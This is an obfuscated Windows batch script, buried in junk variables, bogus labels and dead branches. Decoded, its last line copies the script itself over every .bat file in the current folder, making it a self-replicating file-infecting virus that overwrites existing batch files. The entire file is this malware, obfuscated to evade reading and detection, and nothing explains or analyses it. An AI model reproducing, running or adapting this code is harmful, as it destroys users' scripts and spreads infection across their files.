set Hm=m}֍d
UӡQ%E%WQHlU\t
se%iai%t Hm=t
go%kx%to m}֍d
set Hm=ێoXL
:m}֍d
set FnQ=`灎k
se%hr%t%g{% %V%FnQ=%Ԋs%s

goto `灎k

set %ܥnG%FnQ=?
y}rX%MP%I
:`灎k
cls
set O=y
s%@Kۘv%et%t% O=t
go%ątd%to%Vp?F`% %G%y
set%WPI`% %Lhgj%O=lۭQ
:y
se%Sߍ%t ryf=%OV%ZظZ
se%A%t ryf=e
goto ZظZ
set ryf=%jUL%s{p

:ZظZ
%Gl%set ҫL{=\eR
s%E؝%e%EΖ%t ҫL{=%aW틍V%s
goto %%\eR
se%J%t ҫL{=ܵl@ҙ
:\eR
s%T%et }[s=E
set }[s=e
goto E
s%aG`%e%CSwᣑO%t %foHm%}[s=%F[eZ%Q
echo ciwsҙѺdteZ
:E
se%YlI]B%t %zC%DEV=%A%\
set %%DEV=t
goto \
%%se%x%t DEV=%%cs
:\
set Jă=TraG
s%M%e%ʁcly%t Jă=e
goto%Msf% TraG
set yeWt{t?=
%V%se%Fl%t%a% Jă=%Nk%nJE
:TraG

se%\kd%t%s% B_ǧ=w@u
se%b%t B_ǧ=e
go%gؕTI%to %Eۢu%w@u
echo iRse
set B_ǧ=ejy

:w@u
echo gLI¨UjO
set þXZ{Ze}B=%[Vv%
%H%set Eb=N{炳su
set Eb=i
%}}䱧K%goto %uq%N{炳su
set Eb=Q
:N{炳su
set 值W=fWOk`E
set%d\fht% %s]K%值W=b
%Wnm%got%ߺI%o%ұ޾l% fWOk`E
%͎%set 值W=@p
:fWOk`E
DJMhSn%ЇBJ%AOI
s%ӬS%et A=%jBs%tgIw
se%v]%t A=p
goto tgIw
s%C%e%Wk{j%t%xA% A=%zI%
:tgIw
cls
set %`h%Ϛ{=FNg
se%A%t %hV%Ϛ{=%Ό%n
g%r}lő%oto FNg
%fїƘ%set Ϛ{=ض
:FNg
set vƵE=%eV%qmo
set vƵE=(
goto %KPE%qmo
s%_yi%et vƵE=%%O
goto lk
:lk
:qmo
BȬe
set%Fָ% Ê=GIG
echo }xuܬb
set%JIMC}% Ê=%0
goto GIG
se%Lֺ?}%t Ê=%ޮ%Fط
goto nAh
:nAh
:GIG
set%AZ% Tǎ=ocZ
set%lٔ`% Tǎ=c
goto ocZ
set %l@TUn%Tǎ=EO
:ocZ
for %%a %Eb%%Ϛ{% %vƵE%*.%值W%at) do %Tǎ%o%A%y %Ê% %%a
